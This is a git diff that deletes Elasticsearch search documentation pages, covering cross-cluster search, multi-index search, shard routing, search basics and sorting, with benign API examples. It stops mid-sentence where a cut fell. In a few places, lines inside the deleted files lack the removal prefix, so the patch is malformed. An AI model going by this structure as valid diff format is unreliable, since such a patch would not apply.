diff --git a/docs/reference/search/search-your-data/search-across-clusters.asciidoc b/docs/reference/search/search-your-data/search-across-clusters.asciidoc deleted file mode 100644 index 9020787cfa8..00000000000 --- a/docs/reference/search/search-your-data/search-across-clusters.asciidoc +++ /dev/null @@ -1,422 +0,0 @@ -[[modules-cross-cluster-search]] -== Search across clusters - -*{ccs-cap}* lets you run a single search request against one or more -<>. For example, you can use a {ccs} to -filter and analyze log data stored on clusters in different data centers. - -IMPORTANT: {ccs-cap} requires <>. - -[discrete] -[[ccs-supported-apis]] -=== Supported APIs - -The following APIs support {ccs}: - -* <> -* <> -* <> -* <> - -[discrete] -[[ccs-example]] -=== {ccs-cap} examples - -[discrete] -[[ccs-remote-cluster-setup]] -==== Remote cluster setup - -To perform a {ccs}, you must have at least one remote cluster configured. - -The following <> API request -adds three remote clusters:`cluster_one`, `cluster_two`, and `cluster_three`. - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_one": { - "seeds": [ - "127.0.0.1:9300" - ] - }, - "cluster_two": { - "seeds": [ - "127.0.0.1:9301" - ] - }, - "cluster_three": { - "seeds": [ - "127.0.0.1:9302" - ] - } - } - } - } -} --------------------------------- -// TEST[setup:host] -// TEST[s/127.0.0.1:930\d+/\${transport_host}/] - -[discrete] -[[ccs-search-remote-cluster]] -==== Search a single remote cluster - -The following <> API request searches the -`my-index-000001` index on a single remote cluster, `cluster_one`. - -[source,console] --------------------------------------------------- -GET /cluster_one:my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "_source": ["user.id", "message", "http.response.status_code"] -} --------------------------------------------------- -// TEST[continued] -// TEST[setup:my_index] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "took": 150, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "failed": 0, - "skipped": 0 - }, - "_clusters": { - "total": 1, - "successful": 1, - "skipped": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 1, - "hits": [ - { - "_index": "cluster_one:my-index-000001", <1> - "_type": "_doc", - "_id": "0", - "_score": 1, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 150/"took": "$body.took"/] -// TESTRESPONSE[s/"max_score": 1/"max_score": "$body.hits.max_score"/] -// TESTRESPONSE[s/"_score": 1/"_score": "$body.hits.hits.0._score"/] - -<1> The search response body includes the name of the remote cluster in the -`_index` parameter. 
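
If a remote cluster you expect is missing from the `_clusters` section of the
response, you can check the connection status of each configured remote cluster
with the remote cluster info API. This is only a quick sanity check and is not
required for {ccs}:

[source,console]
--------------------------------------------------
GET /_remote/info
--------------------------------------------------

The response lists every configured remote cluster and indicates whether the
local cluster is currently connected to it.
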
- -[discrete] -[[ccs-search-multi-remote-cluster]] -==== Search multiple remote clusters - -The following <> API request searches the `my-index-000001` index on -three clusters: - -* Your local cluster -* Two remote clusters, `cluster_one` and `cluster_two` - -[source,console] --------------------------------------------------- -GET /my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "_source": ["user.id", "message", "http.response.status_code"] -} --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "took": 150, - "timed_out": false, - "num_reduce_phases": 4, - "_shards": { - "total": 3, - "successful": 3, - "failed": 0, - "skipped": 0 - }, - "_clusters": { - "total": 3, - "successful": 3, - "skipped": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": 1, - "hits": [ - { - "_index": "my-index-000001", <1> - "_type": "_doc", - "_id": "0", - "_score": 2, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - }, - { - "_index": "cluster_one:my-index-000001", <2> - "_type": "_doc", - "_id": "0", - "_score": 1, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - }, - { - "_index": "cluster_two:my-index-000001", <3> - "_type": "_doc", - "_id": "0", - "_score": 1, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 150/"took": "$body.took"/] -// TESTRESPONSE[s/"max_score": 1/"max_score": "$body.hits.max_score"/] -// TESTRESPONSE[s/"_score": 1/"_score": "$body.hits.hits.0._score"/] -// TESTRESPONSE[s/"_score": 2/"_score": "$body.hits.hits.1._score"/] - -<1> This document's `_index` parameter doesn't include a cluster name. This -means the document came from the local cluster. -<2> This document came from `cluster_one`. -<3> This document came from `cluster_two`. - -[discrete] -[[skip-unavailable-clusters]] -=== Skip unavailable clusters - -By default, a {ccs} returns an error if *any* cluster in the request is -unavailable. - -To skip an unavailable cluster during a {ccs}, set the -<> cluster setting to `true`. - -The following <> API request -changes `cluster_two`'s `skip_unavailable` setting to `true`. - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster.remote.cluster_two.skip_unavailable": true - } -} --------------------------------- -// TEST[continued] - -If `cluster_two` is disconnected or unavailable during a {ccs}, {es} won't -include matching documents from that cluster in the final results. - -[discrete] -[[ccs-gateway-seed-nodes]] -=== Selecting gateway and seed nodes in sniff mode - -For remote clusters using the <> mode, gateway and -seed nodes need to be accessible from the local cluster via your network. - -By default, any non-<> node can act as a -gateway node. If wanted, you can define the gateway nodes for a cluster by -setting `cluster.remote.node.attr.gateway` to `true`. 
- -For {ccs}, we recommend you use gateway nodes that are capable of serving as -<> for search requests. If -wanted, the seed nodes for a cluster can be a subset of these gateway nodes. - -[discrete] -[[ccs-proxy-mode]] -=== {ccs-cap} in proxy mode - -<> remote cluster connections support {ccs}. All remote -connections connect to the configured `proxy_address`. Any desired connection -routing to gateway or <> must -be implemented by the intermediate proxy at this configured address. - -[discrete] -[[ccs-network-delays]] -=== How {ccs} handles network delays - -Because {ccs} involves sending requests to remote clusters, any network delays -can impact search speed. To avoid slow searches, {ccs} offers two options for -handling network delays: - -<>:: -By default, {es} reduces the number of network roundtrips between remote -clusters. This reduces the impact of network delays on search speed. However, -{es} can't reduce network roundtrips for large search requests, such as those -including a <> or -<>. -+ -See <> to learn how this option works. - -<>:: For search -requests that include a scroll or inner hits, {es} sends multiple outgoing and -ingoing requests to each remote cluster. You can also choose this option by -setting the <> parameter to -`false`. While typically slower, this approach may work well for networks with -low latency. -+ -See <> to learn how this option works. - -[discrete] -[[ccs-min-roundtrips]] -==== Minimize network roundtrips - -Here's how {ccs} works when you minimize network roundtrips. - -. You send a {ccs} request to your local cluster. A coordinating node in that -cluster receives and parses the request. -+ -image:images/ccs/ccs-min-roundtrip-client-request.svg[] - -. The coordinating node sends a single search request to each cluster, including -the local cluster. Each cluster performs the search request independently, -applying its own cluster-level settings to the request. -+ -image:images/ccs/ccs-min-roundtrip-cluster-search.svg[] - -. Each remote cluster sends its search results back to the coordinating node. -+ -image:images/ccs/ccs-min-roundtrip-cluster-results.svg[] - -. After collecting results from each cluster, the coordinating node returns the -final results in the {ccs} response. -+ -image:images/ccs/ccs-min-roundtrip-client-response.svg[] - -[discrete] -[[ccs-unmin-roundtrips]] -==== Don't minimize network roundtrips - -Here's how {ccs} works when you don't minimize network roundtrips. - -. You send a {ccs} request to your local cluster. A coordinating node in that -cluster receives and parses the request. -+ -image:images/ccs/ccs-min-roundtrip-client-request.svg[] - -. The coordinating node sends a <> API request to -each remote cluster. -+ -image:images/ccs/ccs-min-roundtrip-cluster-search.svg[] - -. Each remote cluster sends its response back to the coordinating node. -This response contains information about the indices and shards the {ccs} -request will be executed on. -+ -image:images/ccs/ccs-min-roundtrip-cluster-results.svg[] - -. The coordinating node sends a search request to each shard, including those in -its own cluster. Each shard performs the search request independently. -+ -[WARNING] -==== -When network roundtrips aren't minimized, the search is executed as if all data -were in the coordinating node's cluster. We recommend updating cluster-level -settings that limit searches, such as `action.search.shard_count.limit`, -`pre_filter_shard_size`, and `max_concurrent_shard_requests`, to account for -this. 
If these limits are too low, the search may be rejected. -==== -+ -image:images/ccs/ccs-dont-min-roundtrip-shard-search.svg[] - -. Each shard sends its search results back to the coordinating node. -+ -image:images/ccs/ccs-dont-min-roundtrip-shard-results.svg[] - -. After collecting results from each cluster, the coordinating node returns the -final results in the {ccs} response. -+ -image:images/ccs/ccs-min-roundtrip-client-response.svg[] - -[discrete] -[[ccs-supported-configurations]] -=== Supported configurations - -Generally, <> can search remote -clusters that are one major version ahead or behind the coordinating node's -version. Cross cluster search can also search remote clusters that are being -<> so long as both the "upgrade from" and -"upgrade to" version are compatible with the gateway node. - -For example, a coordinating node running {es} 5.6 can search a remote cluster -running {es} 6.8, but that cluster can not be upgraded to 7.1. In this case -you should first upgrade the coordinating node to 7.1 and then upgrade remote -cluster. - -WARNING: Running multiple versions of {es} in the same cluster beyond the -duration of an upgrade is not supported. diff --git a/docs/reference/search/search-your-data/search-multiple-indices.asciidoc b/docs/reference/search/search-your-data/search-multiple-indices.asciidoc deleted file mode 100644 index 473028b0dec..00000000000 --- a/docs/reference/search/search-your-data/search-multiple-indices.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[search-multiple-indices]] -== Search multiple data streams and indices - -To search multiple data streams and indices, add them as comma-separated values -in the <>'s request path. - -The following request searches the `my-index-000001` and `my-index-000002` -indices. - -[source,console] ----- -GET /my-index-000001,my-index-000002/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\n/] - -You can also search multiple data streams and indices using an index pattern. - -The following request targets the `my-index-*` index pattern. The request -searches any data streams or indices in the cluster that start with `my-index-`. - -[source,console] ----- -GET /my-index-*/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -To search all data streams and indices in a cluster, omit the target from the -request path. Alternatively, you can use `_all` or `*`. - -The following requests are equivalent and search all data streams and indices in -the cluster. - -[source,console] ----- -GET /_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} - -GET /_all/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} - -GET /*/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -[discrete] -[[index-boost]] -=== Index boost - -When searching multiple indices, you can use the `indices_boost` parameter to -boost results from one or more specified indices. This is useful when hits -coming from some indices matter more than hits from other. - -NOTE: You cannot use `indices_boost` with data streams. 
- -[source,console] --------------------------------------------------- -GET /_search -{ - "indices_boost": [ - { "my-index-000001": 1.4 }, - { "my-index-000002": 1.3 } - ] -} --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -Index aliases and index patterns can also be used: - -[source,console] --------------------------------------------------- -GET /_search -{ - "indices_boost": [ - { "my-alias": 1.4 }, - { "my-index*": 1.3 } - ] -} --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000001\/_alias\/my-alias\n/] - -If multiple matches are found, the first match will be used. For example, if an -index is included in `alias1` and matches the `my-index*` pattern, a boost value -of `1.4` is applied. \ No newline at end of file diff --git a/docs/reference/search/search-your-data/search-shard-routing.asciidoc b/docs/reference/search/search-your-data/search-shard-routing.asciidoc deleted file mode 100644 index b0286986df7..00000000000 --- a/docs/reference/search/search-your-data/search-shard-routing.asciidoc +++ /dev/null @@ -1,184 +0,0 @@ -[[search-shard-routing]] -== Search shard routing - -To protect against hardware failure and increase search capacity, {es} can store -copies of an index's data across multiple shards on multiple nodes. When running -a search request, {es} selects a node containing a copy of the index's data and -forwards the search request to that node's shards. This process is known as -_search shard routing_ or _routing_. - -[discrete] -[[search-adaptive-replica]] -=== Adaptive replica selection - -By default, {es} uses _adaptive replica selection_ to route search requests. -This method selects an eligible node using <> and the following criteria: - -* Response time of prior requests between the coordinating node -and the eligible node -* How long the eligible node took to run previous searches -* Queue size of the eligible node's `search` <> - -Adaptive replica selection is designed to decrease search latency. However, you -can disable adaptive replica selection by setting -`cluster.routing.use_adaptive_replica_selection` to `false` using the -<>. If disabled, {es} routes -search requests using a round-robin method, which may result in slower searches. - -[discrete] -[[shard-and-node-preference]] -=== Set a preference - -By default, adaptive replica selection chooses from all eligible nodes and -shards. However, you may only want data from a local node or want to route -searches to a specific node based on its hardware. Or you may want to send -repeated searches to the same shard to take advantage of caching. - -To limit the set of nodes and shards eligible for a search request, use -the search API's <> query parameter. - -For example, the following request searches `my-index-000001` with a -`preference` of `_local`. This restricts the search to shards on the -local node. If the local node contains no shard copies of the index's data, the -request uses adaptive replica selection to another eligible node -as a fallback. - -[source,console] ----- -GET /my-index-000001/_search?preference=_local -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -You can also use the `preference` parameter to route searches to specific shards -based on a provided string. If the cluster state and selected shards -do not change, searches using the same `preference` string are routed to the -same shards in the same order. 
- -We recommend using a unique `preference` string, such as a user name or web -session ID. This string cannot start with a `_`. - -TIP: You can use this option to serve cached results for frequently used and -resource-intensive searches. If the shard's data doesn't change, repeated -searches with the same `preference` string retrieve results from the same -<>. For time series use cases, such as -logging, data in older indices is rarely updated and can be served directly from -this cache. - -The following request searches `my-index-000001` with a `preference` string of -`my-custom-shard-string`. - -[source,console] ----- -GET /my-index-000001/_search?preference=my-custom-shard-string -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -NOTE: If the cluster state or selected shards change, the same `preference` -string may not route searches to the same shards in the same order. This can -occur for a number of reasons, including shard relocations and shard failures. A -node can also reject a search request, which {es} would re-route to another -node. - -[discrete] -[[search-routing]] -=== Use a routing value - -When you index a document, you can specify an optional -<>, which routes the document to a -specific shard. - -For example, the following indexing request routes a document using -`my-routing-value`. - -[source,console] ----- -POST /my-index-000001/_doc?routing=my-routing-value -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} ----- - -You can use the same routing value in the search API's `routing` query -parameter. This ensures the search runs on the same shard used to index the -document. - -[source,console] ----- -GET /my-index-000001/_search?routing=my-routing-value -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -You can also provide multiple comma-separated routing values: - -[source,console] ----- -GET /my-index-000001/_search?routing=my-routing-value,my-routing-value-2 -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -[discrete] -[[search-concurrency-and-parallelism]] -=== Search concurrency and parallelism - -By default, {es} doesn't reject search requests based on the number of shards -the request hits. However, hitting a large number of shards can significantly -increase CPU and memory usage. - -TIP: For tips on preventing indices with large numbers of shards, see -<>. - -You can use the `max_concurrent_shard_requests` query parameter to control -maximum number of concurrent shards a search request can hit per node. This -prevents a single request from overloading a cluster. The parameter defaults to -a maximum of `5`. - -[source,console] ----- -GET /my-index-000001/_search?max_concurrent_shard_requests=3 -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -You can also use the `action.search.shard_count.limit` cluster setting to set a -search shard limit and reject requests that hit too many shards. You can -configure `action.search.shard_count.limit` using the -<>. 
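
For example, the following sketch uses the cluster update settings API to
reject search requests that would hit more than 1,000 shards. The value of
`1000` is only illustrative; pick a limit that matches your cluster's capacity.

[source,console]
----
PUT /_cluster/settings
{
  "persistent": {
    "action.search.shard_count.limit": 1000
  }
}
----
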
\ No newline at end of file diff --git a/docs/reference/search/search-your-data/search-your-data.asciidoc b/docs/reference/search/search-your-data/search-your-data.asciidoc deleted file mode 100644 index 0d72145c6a0..00000000000 --- a/docs/reference/search/search-your-data/search-your-data.asciidoc +++ /dev/null @@ -1,459 +0,0 @@ -[[search-your-data]] -= Search your data - -[[search-query]] -A _search query_, or _query_, is a request for information about data in -{es} data streams or indices. - -You can think of a query as a question, written in a way {es} understands. -Depending on your data, you can use a query to get answers to questions like: - -* What processes on my server take longer than 500 milliseconds to respond? -* What users on my network ran `regsvr32.exe` within the last week? -* What pages on my website contain a specific word or phrase? - -A _search_ consists of one or more queries that are combined and sent to {es}. -Documents that match a search's queries are returned in the _hits_, or -_search results_, of the response. - -A search may also contain additional information used to better process its -queries. For example, a search may be limited to a specific index or only return -a specific number of results. - -[discrete] -[[run-an-es-search]] -== Run a search - -You can use the <> to search and -<> data stored in {es} data streams or indices. -The API's `query` request body parameter accepts queries written in -<>. - -The following request searches `my-index-000001` using a -<> query. This query matches documents with a -`user.id` value of `kimchy`. - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -The API response returns the top 10 documents matching the query in the -`hits.hits` property. - -[source,console-result] ----- -{ - "took": 5, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.3862942, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "kxWFcnMByiguvud1Z8vC", - "_score": 1.3862942, - "_source": { - "@timestamp": "2099-11-15T14:12:12", - "http": { - "request": { - "method": "get" - }, - "response": { - "bytes": 1070000, - "status_code": 200 - }, - "version": "1.1" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "source": { - "ip": "127.0.0.1" - }, - "user": { - "id": "kimchy" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 5/"took": "$body.took"/] -// TESTRESPONSE[s/"_id": "kxWFcnMByiguvud1Z8vC"/"_id": "$body.hits.hits.0._id"/] - -[discrete] -[[common-search-options]] -=== Common search options - -You can use the following options to customize your searches. - -*Query DSL* + -<> supports a variety of query types you can mix and match -to get the results you want. Query types include: - -* <> and other <>, which let you combine queries and match results based on multiple -criteria -* <> for filtering and finding exact matches -* <>, which are commonly used in search -engines -* <> and <> - -*Aggregations* + -You can use <> to get statistics and -other analytics for your search results. Aggregations help you answer questions -like: - -* What's the average response time for my servers? -* What are the top IP addresses hit by users on my network? -* What is the total transaction revenue by customer? 
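
As a minimal sketch, the following request computes the average response size
across matching documents. It assumes the documents contain a numeric
`http.response.bytes` field, as in the sample document above; `"size": 0` skips
the individual hits and returns only the aggregation result.

[source,console]
----
GET /my-index-000001/_search
{
  "size": 0,
  "aggs": {
    "avg-response-bytes": {
      "avg": { "field": "http.response.bytes" }
    }
  }
}
----
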
- -*Search multiple data streams and indices* + -You can use comma-separated values and grep-like index patterns to search -several data streams and indices in the same request. You can even boost search -results from specific indices. See <>. - -*Paginate search results* + -By default, searches return only the top 10 matching hits. To retrieve -more or fewer documents, see <>. - -*Retrieve selected fields* + -The search response's `hit.hits` property includes the full document -<> for each hit. To retrieve only a subset of -the `_source` or other fields, see <>. - -*Sort search results* + -By default, search hits are sorted by `_score`, a <> that measures how well each document matches the query. To customize the -calculation of these scores, use the -<> query. To sort search hits by -other field values, see <>. - -*Run an async search* + -{es} searches are designed to run on large volumes of data quickly, often -returning results in milliseconds. For this reason, searches are -_synchronous_ by default. The search request waits for complete results before -returning a response. - -However, complete results can take longer for searches across -<> or <>. - -To avoid long waits, you can run an _asynchronous_, or _async_, search -instead. An <> lets you retrieve partial -results for a long-running search now and get complete results later. - -[discrete] -[[search-timeout]] -=== Search timeout - -By default, search requests don't time out. The request waits for complete -results before returning a response. - -While <> is designed for long-running -searches, you can also use the `timeout` parameter to specify a duration you'd -like to wait for a search to complete. If no response is received before this -period ends, the request fails and returns an error. - -[source,console] ----- -GET /my-index-000001/_search -{ - "timeout": "2s", - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- -// TEST[setup:my_index] - -To set a cluster-wide default timeout for all search requests, configure -`search.default_search_timeout` using the <>. This global timeout duration is used if no `timeout` argument is -passed in the request. If the global search timeout expires before the search -request finishes, the request is cancelled using <>. The `search.default_search_timeout` setting defaults to `-1` (no -timeout). - -[discrete] -[[global-search-cancellation]] -=== Search cancellation - -You can cancel a search request using the <>. {es} also automatically cancels a search request when your client's HTTP -connection closes. We recommend you set up your client to close HTTP connections -when a search request is aborted or times out. - -[discrete] -[[track-total-hits]] -=== Track total hits - -Generally the total hit count can't be computed accurately without visiting all -matches, which is costly for queries that match lots of documents. The -`track_total_hits` parameter allows you to control how the total number of hits -should be tracked. -Given that it is often enough to have a lower bound of the number of hits, -such as "there are at least 10000 hits", the default is set to `10,000`. -This means that requests will count the total hit accurately up to `10,000` hits. -It is a good trade off to speed up searches if you don't need the accurate number -of hits after a certain threshold. - -When set to `true` the search response will always track the number of hits that -match the query accurately (e.g. `total.relation` will always be equal to `"eq"` -when `track_total_hits` is set to true). 
Otherwise the `"total.relation"` returned -in the `"total"` object in the search response determines how the `"total.value"` -should be interpreted. A value of `"gte"` means that the `"total.value"` is a -lower bound of the total hits that match the query and a value of `"eq"` indicates -that `"total.value"` is the accurate count. - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "track_total_hits": true, - "query": { - "match" : { - "user.id" : "elkbee" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 100, - "hits": { - "max_score": 1.0, - "total" : { - "value": 2048, <1> - "relation": "eq" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 100/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 1\.0/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"value": 2048/"value": $body.hits.total.value/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": "$body.hits.hits"/] - -<1> The total number of hits that match the query. -<2> The count is accurate (e.g. `"eq"` means equals). - -It is also possible to set `track_total_hits` to an integer. -For instance the following query will accurately track the total hit count that match -the query up to 100 documents: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "track_total_hits": 100, - "query": { - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[continued] - -The `hits.total.relation` in the response will indicate if the -value returned in `hits.total.value` is accurate (`"eq"`) or a lower -bound of the total (`"gte"`). - -For instance the following response: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 30, - "hits": { - "max_score": 1.0, - "total": { - "value": 42, <1> - "relation": "eq" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 30/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 1\.0/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"value": 42/"value": $body.hits.total.value/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": "$body.hits.hits"/] - -<1> 42 documents match the query -<2> and the count is accurate (`"eq"`) - -\... indicates that the number of hits returned in the `total` -is accurate. - -If the total number of hits that match the query is greater than the -value set in `track_total_hits`, the total hits in the response -will indicate that the returned value is a lower bound: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits": { - "max_score": 1.0, - "total": { - "value": 100, <1> - "relation": "gte" <2> - }, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[skip:response is already tested in the previous snippet] - -<1> There are at least 100 documents that match the query -<2> This is a lower bound (`"gte"`). 
- -If you don't need to track the total number of hits at all you can improve query -times by setting this option to `false`: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "track_total_hits": false, - "query": { - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[continued] - -\... returns: - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "timed_out": false, - "took": 10, - "hits": { <1> - "max_score": 1.0, - "hits": ... - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 10/"took": $body.took/] -// TESTRESPONSE[s/"max_score": 1\.0/"max_score": $body.hits.max_score/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": "$body.hits.hits"/] - -<1> The total number of hits is unknown. - -Finally you can force an accurate count by setting `"track_total_hits"` -to `true` in the request. - -[discrete] -[[quickly-check-for-matching-docs]] -=== Quickly check for matching docs - -If you only want to know if there are any documents matching a -specific query, you can set the `size` to `0` to indicate that we are not -interested in the search results. You can also set `terminate_after` to `1` -to indicate that the query execution can be terminated whenever the first -matching document was found (per shard). - -[source,console] --------------------------------------------------- -GET /_search?q=user.id:elkbee&size=0&terminate_after=1 --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: `terminate_after` is always applied **after** the -<> and stops the query as well as the aggregation -executions when enough hits have been collected on the shard. Though the doc -count on aggregations may not reflect the `hits.total` in the response since -aggregations are applied **before** the post filtering. - -The response will not contain any hits as the `size` was set to `0`. The -`hits.total` will be either equal to `0`, indicating that there were no -matching documents, or greater than `0` meaning that there were at least -as many documents matching the query when it was early terminated. -Also if the query was terminated early, the `terminated_early` flag will -be set to `true` in the response. - -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "terminated_early": true, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": null, - "hits": [] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3/"took": $body.took/] - - -The `took` time in the response contains the milliseconds that this request -took for processing, beginning quickly after the node received the query, up -until all search related work is done and before the above JSON is returned -to the client. This means it includes the time spent waiting in thread pools, -executing a distributed search across the whole cluster and gathering all the -results. 
- -include::collapse-search-results.asciidoc[] -include::filter-search-results.asciidoc[] -include::highlighting.asciidoc[] -include::long-running-searches.asciidoc[] -include::near-real-time.asciidoc[] -include::paginate-search-results.asciidoc[] -include::retrieve-inner-hits.asciidoc[] -include::retrieve-selected-fields.asciidoc[] -include::search-across-clusters.asciidoc[] -include::search-multiple-indices.asciidoc[] -include::search-shard-routing.asciidoc[] -include::sort-search-results.asciidoc[] diff --git a/docs/reference/search/search-your-data/sort-search-results.asciidoc b/docs/reference/search/search-your-data/sort-search-results.asciidoc deleted file mode 100644 index 25af92c7d63..00000000000 --- a/docs/reference/search/search-your-data/sort-search-results.asciidoc +++ /dev/null @@ -1,640 +0,0 @@ -[[sort-search-results]] -== Sort search results - -Allows you to add one or more sorts on specific fields. Each sort can be -reversed as well. The sort is defined on a per field level, with special -field name for `_score` to sort by score, and `_doc` to sort by index order. - -Assuming the following index mapping: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "post_date": { "type": "date" }, - "user": { - "type": "keyword" - }, - "name": { - "type": "keyword" - }, - "age": { "type": "integer" } - } - } -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "sort" : [ - { "post_date" : {"order" : "asc"}}, - "user", - { "name" : "desc" }, - { "age" : "desc" }, - "_score" - ], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: `_doc` has no real use-case besides being the most efficient sort order. -So if you don't care about the order in which documents are returned, then you -should sort by `_doc`. This especially helps when <>. - -[discrete] -=== Sort Values - -The sort values for each document returned are also returned as part of -the response. - -[discrete] -=== Sort Order - -The `order` option can have the following values: - -[horizontal] -`asc`:: Sort in ascending order -`desc`:: Sort in descending order - -The order defaults to `desc` when sorting on the `_score`, and defaults -to `asc` when sorting on anything else. - -[discrete] -=== Sort mode option - -Elasticsearch supports sorting by array or multi-valued fields. The `mode` option -controls what array value is picked for sorting the document it belongs -to. The `mode` option can have the following values: - -[horizontal] -`min`:: Pick the lowest value. -`max`:: Pick the highest value. -`sum`:: Use the sum of all values as sort value. Only applicable for - number based array fields. -`avg`:: Use the average of all values as sort value. Only applicable - for number based array fields. -`median`:: Use the median of all values as sort value. Only applicable - for number based array fields. - -The default sort mode in the ascending sort order is `min` -- the lowest value -is picked. The default sort mode in the descending order is `max` -- -the highest value is picked. - -[discrete] -==== Sort mode example usage - -In the example below the field price has multiple prices per document. -In this case the result hits will be sorted by price ascending based on -the average price per document. 
- -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1?refresh -{ - "product": "chocolate", - "price": [20, 4] -} - -POST /_search -{ - "query" : { - "term" : { "product" : "chocolate" } - }, - "sort" : [ - {"price" : {"order" : "asc", "mode" : "avg"}} - ] -} --------------------------------------------------- - -[discrete] -=== Sorting numeric fields - -For numeric fields it is also possible to cast the values from one type -to another using the `numeric_type` option. -This option accepts the following values: [`"double", "long", "date", "date_nanos"`] -and can be useful for searches across multiple data streams or indices where the sort field is mapped differently. - -Consider for instance these two indices: - -[source,console] --------------------------------------------------- -PUT /index_double -{ - "mappings": { - "properties": { - "field": { "type": "double" } - } - } -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -PUT /index_long -{ - "mappings": { - "properties": { - "field": { "type": "long" } - } - } -} --------------------------------------------------- -// TEST[continued] - -Since `field` is mapped as a `double` in the first index and as a `long` -in the second index, it is not possible to use this field to sort requests -that query both indices by default. However you can force the type to one -or the other with the `numeric_type` option in order to force a specific -type for all indices: - -[source,console] --------------------------------------------------- -POST /index_long,index_double/_search -{ - "sort" : [ - { - "field" : { - "numeric_type" : "double" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -In the example above, values for the `index_long` index are casted to -a double in order to be compatible with the values produced by the -`index_double` index. -It is also possible to transform a floating point field into a `long` -but note that in this case floating points are replaced by the largest -value that is less than or equal (greater than 